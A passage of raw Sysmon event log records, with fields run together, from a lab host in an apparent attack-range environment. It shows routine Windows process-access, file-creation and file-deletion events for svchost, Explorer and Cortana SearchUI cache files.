10341000x80000000000000006453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.094{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.094{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.094{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.094{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.094{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.063{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+baba5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9a85|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000006447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.063{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+baba5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9a85|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000006446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.063{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.063{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000006676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.994{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt2021-03-31 12:02:30.994 11241100x80000000000000006675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.994{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt2021-03-31 12:02:30.978 23542300x80000000000000006674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.994{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt2021-03-31 12:02:30.978 11241100x80000000000000006672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt2021-03-31 12:02:30.978 23542300x80000000000000006671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt2021-03-31 12:02:30.978 11241100x80000000000000006669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt2021-03-31 12:02:30.978 23542300x80000000000000006668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt2021-03-31 12:02:30.978 11241100x80000000000000006666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt2021-03-31 12:02:30.978 23542300x80000000000000006665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt2021-03-31 12:02:30.978 11241100x80000000000000006663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt2021-03-31 12:02:30.978 23542300x80000000000000006662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt2021-03-31 12:02:30.978 11241100x80000000000000006660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.963{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt2021-03-31 12:02:30.963 23542300x80000000000000006659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.963{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.963{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt2021-03-31 12:02:30.963 11241100x80000000000000006657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.963{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt2021-03-31 12:02:30.963 23542300x80000000000000006656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.963{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.963{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt2021-03-31 12:02:30.963 11241100x80000000000000006654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.963{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt2021-03-31 12:02:30.963 23542300x80000000000000006653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.963{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.963{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt2021-03-31 12:02:30.963 11241100x80000000000000006651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.947{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt2021-03-31 12:02:30.947 23542300x80000000000000006650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.947{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.947{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt2021-03-31 12:02:30.947 11241100x80000000000000006648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.947{266CAFBE-64C4-6064-9E00-00000000AE01}3120C:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\container.dat2021-03-31 12:02:30.947 11241100x80000000000000006647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.947{266CAFBE-64C4-6064-9E00-00000000AE01}3120C:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\container.dat2021-03-31 12:02:30.947 11241100x80000000000000006646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.885{266CAFBE-64C4-6064-9E00-00000000AE01}3120C:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\container.dat2021-03-31 12:02:30.885 10341000x80000000000000006645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 